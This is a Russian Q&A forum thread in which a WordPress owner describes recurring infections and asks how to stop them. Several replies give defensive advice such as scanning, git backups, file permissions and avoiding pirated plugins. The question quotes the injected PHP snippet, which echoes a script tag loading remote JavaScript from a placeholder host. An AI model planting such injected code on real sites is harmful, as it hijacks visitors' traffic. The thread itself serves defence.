Задать вопрос
erstet
@erstet

Как закрыть дыру в WP?

Всем привет! Периодически злоумышленники атакую сайты на Wordpress через какую-то дуру, в последствии чего гугл ругается и в хедере всех тем (в том числе и стандартных) появляется такой код (который как я понял ворует трафик..?)
<?php
#a913f8#
if(empty($euyue)) {
$euyue = "<script type=\"text/javascript\" src=\"http://сайт засранца который ведет на js"></script>";
echo $euyue;
}
#/a913f8#
?>

цифры что после # всегда разные, сайты редиректа тоже.
Устал уже бороться с этим, обновляю движок регулярно, за плагинами тоже слежу, единственное это то, что не все из них купленные...но не смотря ни на что хоть раз в месяц где - нибудь да "прыщик" вскочит.
Кто-нибудь сталкивался с такими же траблами если да, то что служило причиной, и каким методом закрыли дыру??
Может как-то запретить какие-либо изменения во всех файлах на сайте без моего вмешательства?
Поделитесь пожалуйста опытом или догадками..
  • Вопрос задан
  • 317 просмотров
Подписаться 1 Оценить Комментировать
Пригласить эксперта
Ответы на вопрос 4
WPScan в помощь. Чекни им, большинство паблик уязвимостей в WP есть в их базе
Ответ написан
orlov0562
@orlov0562
I'm cool!
Сложно найти таблетку от всех напастей.

Самые сложные заразы, чистились установкой нового вордпресса, и переносом постов с помощью самописных скриптов.

Для защиты советую использовать git, в котором будет храниться не зараженная версия, лучше всего на стороннем сервере. Как результат, в случае модификации файлов, вы практически всегда сможете это обнаружить + откатиться на предыдущую не зараженну.ю копию.
Так же, если есть такая возможность, можно установить права на соответствующие файлы запрещающее их редактирование пользователем от которого работает веб-сервер.

Так же учтите, что вирус может к Вам проникать, не через ваш сайт, а через сайт соседей по хостингу (разумеется, если хостер оставил такую возможность).
Ответ написан
Комментировать
7kmarat
@7kmarat
впепеу
Комментировать
HeadOnFire
@HeadOnFire
PHP, Laravel & WordPress Evangelist
за плагинами тоже слежу, единственное это то, что не все из них купленные...

Если вы имеете в виду, что они сп*жжены (занулены / вылечены от жадности) - тогда у вас в одном из этих "бесплатных" плагинов стоит бекдор, даю 9 из 10. Лечится заменой ворованного софта на честно приобретенный (либо бесплатный аналог)
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы